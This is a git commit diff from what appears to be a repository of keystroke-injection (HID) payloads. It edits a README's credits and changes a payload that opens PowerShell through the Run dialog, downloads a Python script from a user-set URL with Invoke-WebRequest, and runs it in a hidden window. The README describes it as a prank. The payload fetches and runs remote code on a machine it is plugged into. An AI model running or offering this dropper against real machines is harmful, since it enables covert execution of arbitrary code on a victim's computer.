pull/625/head
Aleff 2024-06-11 09:31:29 +02:00
parent 87225ee839
commit 245278a2e4
2 changed files with 7 additions and 12 deletions

View File

@ -22,7 +22,7 @@ Opens a shell, dowloand the Python script that will prank your friends mouving t
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<h2 align="center">Aleff</h2>
<div align=center>
<table>
<tr>
@ -32,17 +32,11 @@ Opens a shell, dowloand the Python script that will prank your friends mouving t
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
<br>LinkedIn
</td>
</tr>
</table>

View File

@ -13,18 +13,19 @@ ATTACKMODE HID
# Requirements:
# - Internet Connection
# VARIABLES
# - Set your Python script link
SCRIPT-PY-LINK='example.com'
QUACK DELAY 1000
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell
QUACK ENTER
QUACK DELAY 500
# REQUIRED - Set your Python script link
QUACK STRING Invoke-WebRequest -Uri \"SCRIPT-PY-LINK\" -OutFile \"script.py\"
QUACK STRING Invoke-WebRequest -Uri \"$SCRIPT-PY-LINK\" -OutFile \"script.py\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING Start-Process python.exe -ArgumentList \"script.py\" -WindowStyle Hidden
QUACK ENTER
QUACK DELAY 1000